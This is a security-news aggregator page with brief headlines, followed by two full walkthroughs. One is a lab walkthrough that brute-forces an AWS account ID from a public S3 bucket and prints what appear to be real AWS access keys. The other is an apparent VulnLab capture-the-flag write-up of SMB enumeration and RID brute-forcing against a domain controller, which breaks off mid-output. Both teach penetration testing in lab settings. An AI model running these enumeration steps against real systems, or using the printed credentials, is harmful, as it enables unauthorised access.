Security News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added two security flaws impacting Palo Alto Networks PAN-OS and SonicWall SonicOS SSLVPN to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The flaws are listed below - CVE-2025-0108 (CVSS score: 7.8) - An authentication bypass vulnerability in the Palo Alto Networks PAN-OS

by The Hacker News

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SonicOS and Palo Alto PAN-OS vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple iOS and iPadOS and Mitel SIP Phones vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are: Researchers recently warned that threat actors […]

by Security Affairs

Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. “What sets Kunai apart is its ability to go beyond simple event generation. While most security monitoring tools rely on syscalls or kernel function hooking, Kunai takes a more advanced approach by correlating events on the host and providing enriched insights. This means fewer but more meaningful events, reducing noise and the strain on log ingestion while delivering deeper visibility … More → The post Kunai: Open-source threat hunting tool for Linux appeared first on Help Net Security.

by Help Net Security

The cybersecurity startup landscape is at a crossroads. As venture-backed companies strive for successful exits, the bar has risen dramatically, requiring more funding, higher revenue, and faster growth than ever before. In this Help Net Security video, Mark Kraynak, Founding Partner at Acrew Capital, breaks down the Exit Escape Velocity for Cybersecurity Startups report to explore the challenges of IPOs and M&A deals in the post-COVID era. The post VC-backed cybersecurity startups and the exit crunch appeared first on Help Net Security.

by Help Net Security

Picture By Leonardo AI | AWSScenarioThe ability to expose and leverage even the smallest oversights is a coveted skill. A global Logistics Company has reached out to our cybersecurity company for assistance and have provided the IP address of their website. Your objective? Start the engagement and use this IP address to identify their AWS account ID via a public S3 bucket so we can commence the process of enumeration.Lab prerequisitesBasic Linux command line knowledgeLearning outcomesKnowledge of a technique that can be used to find AWS Account IDsUnderstanding what a tool does by performing a code reviewDifficultyFoundationsFocusRedReal-world contextIf threat actors get their hands on an AWS Account ID, they can try to identify the IAM roles and users tied to that account. They can do this by taking advantage of detailed error messages that AWS services return when inputting an incorrect username or role name. These messages can verify if an IAM user or role exists, which can help threat actors compile a list of possible targets in the AWS account. It’s also possible to filter public EBS and RDS snapshots by the AWS Account ID that owns it.EnumerationThe scan shows that port 53 (TCP) is open and running ISC BIND 9.16.23 on RedHat Linux. Port 80 (TCP) is also open, hosting an Apache HTTP server (version 2.4.52) on Ubuntu. The server’s title is ‘Mega Big Tech,’ and the HTTP response headers confirm its running Apache 2.4.52 on Ubuntu.┌──(root㉿kali)-[/home/kali/AWS]└─# nmap -sC -sV -A 54.204.171.32 -T4 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 17:47 ESTNmap scan report for ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)Host is up (0.13s latency).Not shown: 998 filtered tcp ports (no-response)PORT STATE SERVICE VERSION53/tcp open domain ISC BIND 9.16.23 (RedHat Linux)| dns-nsid: |_ bind.version: 9.16.23-RH80/tcp open http Apache httpd 2.4.52 ((Ubuntu))|_http-server-header: Apache/2.4.52 (Ubuntu)|_http-title: Mega Big TechWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purpose|router|storage-miscRunning (JUST GUESSING): Linux 2.6.X|3.X|4.X|5.X (87%), MikroTik RouterOS 7.X (87%), Synology DiskStation Manager 5.X (85%)OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0 cpe:/a:synology:diskstation_manager:5.2Aggressive OS guesses: Linux 2.6.32 (87%), Linux 2.6.32 - 3.13 (87%), Linux 3.10 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.14 (87%), Linux 3.4 - 3.10 (87%), Linux 4.15 (87%), Linux 4.15 - 5.19 (87%), Linux 4.19 (87%), Linux 5.0 - 5.14 (87%)No exact OS matches for host (test conditions non-ideal).Network Distance: 25 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT ADDRESS1 13.63 ms 192.168.0.12 15.48 ms 10.14.161.13 ... 45 19.71 ms 10.240.254.536 ... 89 18.36 ms 10.200.22.110 17.00 ms static-65.115.194.14-tataidc.co.in (14.194.115.65)11 9.34 ms 10.124.248.8112 11.21 ms 115.113.172.125.static-kolkata.vsnl.net.in (115.113.172.125)13 82.12 ms 172.28.176.25314 188.48 ms ix-ae-0-100.tcore1.mlv-mumbai.as6453.net (180.87.38.5)15 246.71 ms if-be-13-2.ecore1.mlv-mumbai.as6453.net (180.87.38.29)16 322.19 ms if-be-47-2.ecore1.emrs2-marseille.as6453.net (80.231.217.52)17 326.42 ms if-bundle-15-2.qcore1.pye-paris.as6453.net (80.231.154.32)18 ...19 340.08 ms 63.243.137.14820 ... 2425 279.83 ms ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 49.86 secondsWeb PageThis brings us to the website for Mega Big Tech. There doesn’t appear to be any noteworthy functionality, so let’s take a look at the source code. <section class="product-mac"> <div class="container"> <h2>WorkPro</h2> <div class="grid"> <div class="grid-product"> <img src="https://mega-big-tech.s3.amazonaws.com/images/workpro1.jpg"> <div class="grid-detail"> <p>WorkPro</p> <p>From $5,000</p> </div> </div>This shows that the images are hosted on an Amazon S3 bucket named ‘mega-big-tech’.<?xml version="1.0" encoding="UTF-8"?><ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>mega-big-tech</Name><Prefix></Prefix><Marker></Marker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated><Contents><Key>images/</Key><LastModified>2023-06-25T22:40:57.000Z</LastModified><ETag>"d41d8cd98f00b204e9800998ecf8427e"</ETag><Size>0</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/banner.jpg</Key><LastModified>2023-06-25T22:42:34.000Z</LastModified><ETag>"3ad5c014c01ffeb0743182379d2cd80d"</ETag><Size>3184176</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro1.jpg</Key><LastModified>2023-06-25T22:42:35.000Z</LastModified><ETag>"f5435f26a11fac38006d8fe32ed75045"</ETag><Size>941294</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro2.jpg</Key><LastModified>2023-06-25T22:42:36.000Z</LastModified><ETag>"c7b217afa365714334597643889c5daa"</ETag><Size>1660205</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro3.jpg</Key><LastModified>2023-06-25T22:42:37.000Z</LastModified><ETag>"11acc403ec7efabdf2743404e1fc6be7"</ETag><Size>490794</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro4.jpg</Key><LastModified>2023-06-25T22:42:38.000Z</LastModified><ETag>"2ba1a84a0908e91bec8d05981c28fc40"</ETag><Size>2415092</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro1.jpg</Key><LastModified>2023-06-25T22:42:39.000Z</LastModified><ETag>"8b2541f6138dd34e392f45fc6ab8ba6f"</ETag><Size>1003564</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro2.jpg</Key><LastModified>2023-06-25T22:42:40.000Z</LastModified><ETag>"f9bf19e16a9a31a6754d7c55d0576ec4"</ETag><Size>1277058</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro3.jpg</Key><LastModified>2023-06-25T22:42:41.000Z</LastModified><ETag>"c5e3b974eb2a8cc3cb6cd7f14a358419"</ETag><Size>2322525</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro4.jpg</Key><LastModified>2023-06-25T22:42:42.000Z</LastModified><ETag>"e77b77f088be31b907562c1c08d3c1ea"</ETag><Size>4080373</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro1.jpg</Key><LastModified>2023-06-25T22:42:43.000Z</LastModified><ETag>"8c6b69baa95f5a7ed0f9d2e1dae73160"</ETag><Size>1160096</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro2.jpg</Key><LastModified>2023-06-25T22:42:44.000Z</LastModified><ETag>"ab66d316fbdfa90eea53e89855dc243f"</ETag><Size>2877784</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro3.jpg</Key><LastModified>2023-06-25T22:42:46.000Z</LastModified><ETag>"a105349b350b257b05438dbc1c8fbe4d"</ETag><Size>3232387</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro4.jpg</Key><LastModified>2023-06-25T22:42:47.000Z</LastModified><ETag>"f5315cb77b5de5a74c13417e185d3953"</ETag><Size>3041540</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro5.jpg</Key><LastModified>2023-06-25T22:42:49.000Z</LastModified><ETag>"f137be90eec86dd71da37f25bdc5452e"</ETag><Size>3400957</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro1.jpg</Key><LastModified>2023-06-25T22:42:50.000Z</LastModified><ETag>"ee9140f394608d8ed638c9b39b9c1c4f"</ETag><Size>1632585</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro2.jpg</Key><LastModified>2023-06-25T22:42:51.000Z</LastModified><ETag>"fd33607a6406f4a6cb1550cba96ea200"</ETag><Size>1081259</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro3.jpg</Key><LastModified>2023-06-25T22:42:54.000Z</LastModified><ETag>"78fec3d6d2c81294346fa618ba0caf00"</ETag><Size>1599810</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro4.jpg</Key><LastModified>2023-06-25T22:42:56.000Z</LastModified><ETag>"9a70d62b2f2bd2bf6604943bde09f6bd"</ETag><Size>1144134</Size><StorageClass>STANDARD</StorageClass></Contents></ListBucketResult>Checking the bucket in the browser reveals an ‘images’ directory containing more images, but nothing particularly interesting.Once we have the S3 bucket name, we can try to determine the AWS Account ID that owns it. Security researcher Ben Bridts has shown that brute-forcing an AWS Account ID for an S3 bucket is possible. You can read his research post and review the code here for more details.The core idea is that the script creates a policy leveraging the S3:ResourceAccount Policy Condition Key, which evaluates whether access should be granted based on the AWS account tied to the S3 bucket. Instead of randomly guessing billions of account IDs, the script intelligently reduces the possible search space by using string matching and wildcards. Each correctly identified digit is stored, and the process continues until the full account ID is discovered.For this task, we have provided a user with a role that can be assumed to perform the attack. However, if you prefer to set up the user and role yourself, the necessary policies are listed below.The IAM user taking on the role must have the following policy attached.{ "Version": "2012-10-17", "Statement": { "Effect": "Allow", "Action": "sts:AssumeRole", "Resource": "arn:aws:iam::<your aws account id>:role/<your role name>" }}The role your user can assume has a policy that grants s3:GetObject and s3:ListBucket permissions for the mega-big-tech bucket.{ "Version": "2012-10-17", "Statement": [ { "Sid": "Enum", "Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::mega-big-tech/*" }, { "Sid": "Enum1", "Effect": "Allow", "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::mega-big-tech" } ]}The role would also include the following trust policy, which permits the user to take on the role.{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": "arn:aws:iam::<your aws account id>:user/s3enum" }, "Action": "sts:AssumeRole" } ]}We’ll use our existing user moving forward. Start by setting the provided credentials with aws configure. This allows us to execute commands as the user who can assume the role with the s3:GetObject and s3:ListBucket permissions. Assuming a role with one of these permissions is necessary for the script to work.┌──(root㉿kali)-[/home/kali/AWS]└─# aws configure AWS Access Key ID [****************FGCD]: AKIAWHEOTHRFW4CEP7HKAWS Secret Access Key [****************Y6jP]: UdUVhr+voMltL8PlfQqHFSf4N9casfzUkwsW4Hq3Default region name [us-east-1]: Default output format [None]: ┌──(root㉿kali)-[/home/kali/AWS]└─# aws sts get-caller-identity { "UserId": "AIDAWHEOTHRF62U7I6AWZ", "Account": "427648302155", "Arn": "arn:aws:iam::427648302155:user/s3user"}1. sudo apt install python3-venv2. python3 -m venv venv3. source venv/bin/activate4. pip install s3-account-searchFirst, create a virtual environment to install the s3-account-search tool. Follow these steps:Install the Python virtual environment package.Create a new virtual environment.Activate the virtual environment.Install the s3-account-search tool.Once that’s done, you can proceed to provide the Amazon Resource Name (ARN) of the role under your control (in your AWS account) and specify the target S3 bucket in the AWS account whose ID you want to enumerate. The command will look like this:s3-account-search arn:aws:iam::427648302155:role/LeakyBucket mega-big-tech┌──(venv)─(root㉿kali)-[/home/kali]└─# s3-account-search arn:aws:iam::427648302155:role/LeakyBucket mega-big-techStarting search (this can take a while)found: 1found: 10found: 107found: 1075found: 10751found: 107513found: 1075135found: 10751350found: 107513503found: 1075135037found: 10751350379found: 107513503799This reveals the AWS account ID 107513503799. We can use this information to search for publicly exposed resources, such as public EBS or RDS snapshots, that might have been unintentionally shared by the account owner.To proceed, it’s essential to identify the AWS region where the S3 bucket resides, as public snapshots are available in the same region. If the S3 bucket is in a particular region, other resources could also be exposed there.To find the region of the S3 bucket, we can use a simple cURL trick.┌──(kali㉿kali)-[~]└─$ curl -I https://mega-big-tech.s3.amazonaws.comHTTP/1.1 200 OKx-amz-id-2: wvNpGkjc19GcRdsMvlsrHvB5H9Z+LY1ZTAYT0ce2mAsEd1HjBDCD+jBPFe+kBlImpJme2BamURM=x-amz-request-id: WZPV5AW4P7XFRQN8Date: Mon, 17 Feb 2025 23:52:47 GMTx-amz-bucket-region: us-east-1x-amz-access-point-alias: falseContent-Type: application/xmlTransfer-Encoding: chunkedServer: AmazonS3In the response headers, we can see that the x-amz-bucket-region is set to us-east-1, which corresponds to North Virginia. Now, log into the AWS Management Console using your personal AWS account and ensure that the us-east-1 region is selected.Console HomeNext, search for the EC2 service in the AWS Management Console. Click on the service, and in the EC2 dashboard, navigate to the left-hand menu. Under the Elastic Block Store section, select Snapshots. In the dropdown list, choose Public snapshots, then paste the discovered AWS account ID into the field and hit Enter/Return. After a brief wait, you’ll get a result showing that the company has a publicly exposed EBS snapshot! PWNED!SnapshotsThe objective of this lab is to identify the AWS account ID associated with the S3 bucket, which will serve as the flag.Additionally, you can use the following CLI command to list public EBS snapshots created in the AWS account:aws ec2 describe-snapshots --owner-ids 107513503799 --query ''Snapshots[]'' --region=us-east-1Snapshots in CLIAlthough AWS account IDs are not inherently sensitive — often appearing in public documentation or source code — they can still be useful in a security assessment. Identifying an organization’s AWS account ID can help pinpoint public resources or uncover potential misconfigurations tied to that account.From a detection standpoint, the STS actions used in this method are executed within the enumerator’s AWS account. As a result, these actions do not generate logs that the S3 bucket owner can view. However, for improved monitoring, the bucket owner can enable S3 data events, albeit at an additional cost, to log access attempts and other relevant activities.I hope you enjoyed this writeup! Happy Hacking :)Subscribe to me on Medium and be sure to turn on email notifications so you never miss out on my latest walkthroughs, write-ups, and other informative posts.Follow me on below Social Media:LinkedIn: Reju Kole2. Instagram: reju.kole.93. Respect me On HackTheBox! : Hack The Box :: User Profile4. Check My TryHackMe Profile : TryHackMe | W40X5. Twitter | X : @Mr_W40X6. GitHub : W40X | Reju Kole | Security Researcherincase you need any help feel free to message me on my social media handles.Identify the AWS Account ID from a Public S3 Bucket was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

“This story was originally published on my previous Medium account, which was unfortunately deleted. The original post garnered…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Hello, amazing people and bug bounty hunters! 👋Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

READ IT FOR FREEContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Common Mistakes and Practical Techniques to Tackle them to Find Valid Bugs/Leaks in JS FilesContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Retro | VulnLabAnd here we go again! It’s Maverick, back with another VulnLab machine — this time diving into AD CS, specifically ESC1.Now, if you don’t know what AD CS is… well, where have you been? 😆 Back in 2021, Will Schroeder and Lee Chagolla-Christensen dropped an absolute banger of a research paper on Active Directory Certificate Services (AD CS) attacks. I highly recommend checking out their blog and research paper (“Certified Pre-Owned: Abusing Active Directory Certificate Services”) it’s a goldmine for anyone interested in AD security.https://medium.com/media/b63a843835dcdbce72b140452a42a757/hrefLet’s kick things off with an Nmap scan to uncover the open ports and running services on the target.nmap -sCV 10.10.124.218 -oN nmap Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 20:48 EETNmap scan report for 10.10.124.218Host is up (0.56s latency).Not shown: 988 filtered tcp ports (no-response)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-17 18:54:38Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC.retro.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl| Not valid before: 2025-02-17T18:44:38|_Not valid after: 2026-02-17T18:44:38|_ssl-date: TLS randomness does not represent time445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC.retro.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl| Not valid before: 2025-02-17T18:44:38|_Not valid after: 2026-02-17T18:44:38|_ssl-date: TLS randomness does not represent time3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC.retro.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl| Not valid before: 2025-02-17T18:44:38|_Not valid after: 2026-02-17T18:44:38|_ssl-date: TLS randomness does not represent time3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=DC.retro.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl| Not valid before: 2025-02-17T18:44:38|_Not valid after: 2026-02-17T18:44:383389/tcp open ms-wbt-server Microsoft Terminal Services| rdp-ntlm-info: | Target_Name: RETRO| NetBIOS_Domain_Name: RETRO| NetBIOS_Computer_Name: DC| DNS_Domain_Name: retro.vl| DNS_Computer_Name: DC.retro.vl| Product_Version: 10.0.20348|_ System_Time: 2025-02-17T18:55:29+00:00|_ssl-date: 2025-02-17T18:56:07+00:00; +5m35s from scanner time.| ssl-cert: Subject: commonName=DC.retro.vl| Not valid before: 2025-02-16T18:53:28|_Not valid after: 2025-08-18T18:53:28Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 5m34s, deviation: 0s, median: 5m34s| smb2-security-mode: | 3:1:1: |_ Message signing enabled and required| smb2-time: | date: 2025-02-17T18:55:28|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 127.40 secondsSo, what do we have? We have Kerberos, LDAP, DNS, and SMB. Let’s enumerate them one by one in detail. Are you ready? The journey is beginning!smbChecking SMB anonymous login using smbclient.┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# smbclient -L //10.10.124.218//Password for [WORKGROUP\root]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Notes Disk SYSVOL Disk Logon server share Trainees Disk Reconnecting with SMB1 for workgroup listing.do_connect: Connection to 10.10.124.218 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)Unable to connect with SMB1 -- no workgroup available┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc smb 10.10.124.218 -u user -p user SMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)SMB 10.10.124.218 445 DC [+] retro.vl\user:user (Guest)┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# smbclient //10.10.124.218/Trainees -U test Password for [WORKGROUP\test]:Try "help" to get a list of possible commands.smb: \> help ? allinfo altname archive backup blocksize cancel case_sensitive cd chmod chown close del deltree dir du echo exit get getfacl geteas hardlink help history iosize lcd link lock lowercase ls l mask md mget mkdir mkfifo more mput newer notify open posix posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink posix_whoami print prompt put pwd q queue quit readlink rd recurse reget rename reput rm rmdir showacls setea setmode scopy stat symlink tar tarmode timeout translate unlock volume vuid wdel logon listconnect showconnect tcon tdis tid utimes logoff .. ! smb: \> ls . D 0 Mon Jul 24 00:58:43 2023 .. DHS 0 Wed Jul 26 12:54:14 2023 Important.txt A 288 Mon Jul 24 01:00:13 2023 6261499 blocks of size 4096. 2220912 blocks availablesmb: \> get Important.txtgetting file \Important.txt of size 288 as Important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \> ┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# cat Important.txt Dear Trainees,I know that some of you seemed to struggle with remembering strong and unique passwords.So we decided to bundle every one of you up into one account.Stop bothering us. Please. We have other stuff to do than resetting your password every day.RegardsThe AdminsAfter finding “trainee” in SMB and investigating further, I checked their shared files and validated their existence as users. At this point, I like to check for a RID cycling attack — it often gives me great results for discovering valid users to enumerate further. I used netxec for this because, as I’ve mentioned before in my write-ups, it’s the Swiss Army knife of tools—I absolutely love it!┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc smb 10.10.124.218 -u trainee -p ''trainee'' --rid-brute 10000SMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)SMB 10.10.124.218 445 DC [+] retro.vl\trainee:trainee SMB 10.10.124.218 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)SMB 10.10.124.218 445 DC 500: RETRO\Administrator (SidTypeUser)SMB 10.10.124.218 445 DC 501: RETRO\Guest (SidTypeUser)SMB 10.10.124.218 445 DC 502: RETRO\krbtgt (SidTypeUser)SMB 10.10.124.218 445 DC 512: RETRO\Domain Admins (SidTypeGroup)SMB 10.10.124.218 445 DC 513: RETRO\Domain Users (SidTypeGroup)SMB 10.10.124.218 445 DC 514: RETRO\Domain Guests (SidTypeGroup)SMB 10.10.124.218 445 DC 515: RETRO\Domain Computers (SidTypeGroup)SMB 10.10.124.218 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)SMB 10.10.124.218 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)SMB 10.10.124.218 445 DC 518: RETRO\Schema Admins (SidTypeGroup)SMB 10.10.124.218 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)SMB 10.10.124.218 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)SMB 10.10.124.218 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)SMB 10.10.124.218 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)SMB 10.10.124.218 445 DC 525: RETRO\Protected Users (SidTypeGroup)SMB 10.10.124.218 445 DC 526: RETRO\Key Admins (SidTypeGroup)SMB 10.10.124.218 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)SMB 10.10.124.218 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)SMB 10.10.124.218 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)SMB 10.10.124.218 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)SMB 10.10.124.218 445 DC 1000: RETRO\DC$ (SidTypeUser)SMB 10.10.124.218 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)SMB 10.10.124.218 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)SMB 10.10.124.218 445 DC 1104: RETRO\trainee (SidTypeUser)SMB 10.10.124.218 445 DC 1106: RETRO\BANKING$ (SidTypeUser)SMB 10.10.124.218 445 DC 1107: RETRO\jburley (SidTypeUser)SMB 10.10.124.218 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)SMB 10.10.124.218 445 DC 1109: RETRO\tblack (SidTypeUser)You can also do this with impacket-lookupsids!# you can use this command to filter userslookupsid.py anonymous@10.10.124.218 -no-pass | grep ''SidTypeUser'' | sed ''s/RETRO\\//g'' | awk ''{print $2}'' > clean_users.txt┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# lookupsid.py anonymous@10.10.124.218 -no-passImpacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Brute forcing SIDs at 10.10.124.218[*] StringBinding ncacn_np:10.10.124.218[\pipe\lsarpc][*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)500: RETRO\Administrator (SidTypeUser)501: RETRO\Guest (SidTypeUser)502: RETRO\krbtgt (SidTypeUser)512: RETRO\Domain Admins (SidTypeGroup)513: RETRO\Domain Users (SidTypeGroup)514: RETRO\Domain Guests (SidTypeGroup)515: RETRO\Domain Computers (SidTypeGroup)516: RETRO\Domain Controllers (SidTypeGroup)517: RETRO\Cert Publishers (SidTypeAlias)518: RETRO\Schema Admins (SidTypeGroup)519: RETRO\Enterprise Admins (SidTypeGroup)520: RETRO\Group Policy Creator Owners (SidTypeGroup)521: RETRO\Read-only Domain Controllers (SidTypeGroup)522: RETRO\Cloneable Domain Controllers (SidTypeGroup)525: RETRO\Protected Users (SidTypeGroup)526: RETRO\Key Admins (SidTypeGroup)527: RETRO\Enterprise Key Admins (SidTypeGroup)553: RETRO\RAS and IAS Servers (SidTypeAlias)571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)1000: RETRO\DC$ (SidTypeUser)1101: RETRO\DnsAdmins (SidTypeAlias)1102: RETRO\DnsUpdateProxy (SidTypeGroup)1104: RETRO\trainee (SidTypeUser)1106: RETRO\BANKING$ (SidTypeUser)1107: RETRO\jburley (SidTypeUser)1108: RETRO\HelpDesk (SidTypeGroup)1109: RETRO\tblack (SidTypeUser) ┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]Checking for Capability of Trainee User┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc smb 10.10.124.218 -u trainee -p ''trainee'' --shares SMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)SMB 10.10.124.218 445 DC [+] retro.vl\trainee:trainee SMB 10.10.124.218 445 DC [*] Enumerated sharesSMB 10.10.124.218 445 DC Share Permissions RemarkSMB 10.10.124.218 445 DC ----- ----------- ------SMB 10.10.124.218 445 DC ADMIN$ Remote AdminSMB 10.10.124.218 445 DC C$ Default shareSMB 10.10.124.218 445 DC IPC$ READ Remote IPCSMB 10.10.124.218 445 DC NETLOGON READ Logon server shareSMB 10.10.124.218 445 DC Notes READ SMB 10.10.124.218 445 DC SYSVOL READ Logon server shareSMB 10.10.124.218 445 DC Trainees READ Now we’ve got “Notes” — have you seen this before? Nope? Let’s check it out!┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# smbclient -U ''trainee'' //10.10.124.218/NotesPassword for [WORKGROUP\trainee]:Try "help" to get a list of possible commands.smb: \> ls . D 0 Mon Jul 24 01:03:16 2023 .. DHS 0 Wed Jul 26 12:54:14 2023 ToDo.txt A 248 Mon Jul 24 01:05:56 2023 6261499 blocks of size 4096. 2893217 blocks availablesmb: \> get ToDo.txtgetting file \ToDo.txt of size 248 as ToDo.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \> exit ┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# cat ToDo.txt Thomas,after convincing the finance department to get rid of their ancienct banking softwareit is finally time to clean up the mess they made. We should start with the pre createdcomputer account. That one is older than me.BestJames For further SMB enumeration, I used the -M spider_plus module in NetExec. You should always use this—it''s a game-changer!┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc smb 10.10.124.218 -u trainee -p ''trainee'' -M spider_plus SMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)SMB 10.10.124.218 445 DC [+] retro.vl\trainee:trainee SPIDER_PLUS 10.10.124.218 445 DC [*] Started module spidering_plus with the following options:SPIDER_PLUS 10.10.124.218 445 DC [*] DOWNLOAD_FLAG: FalseSPIDER_PLUS 10.10.124.218 445 DC [*] STATS_FLAG: TrueSPIDER_PLUS 10.10.124.218 445 DC [*] EXCLUDE_FILTER: [''print$'', ''ipc$'']SPIDER_PLUS 10.10.124.218 445 DC [*] EXCLUDE_EXTS: [''ico'', ''lnk'']SPIDER_PLUS 10.10.124.218 445 DC [*] MAX_FILE_SIZE: 50 KBSPIDER_PLUS 10.10.124.218 445 DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plusSMB 10.10.124.218 445 DC [*] Enumerated sharesSMB 10.10.124.218 445 DC Share Permissions RemarkSMB 10.10.124.218 445 DC ----- ----------- ------SMB 10.10.124.218 445 DC ADMIN$ Remote 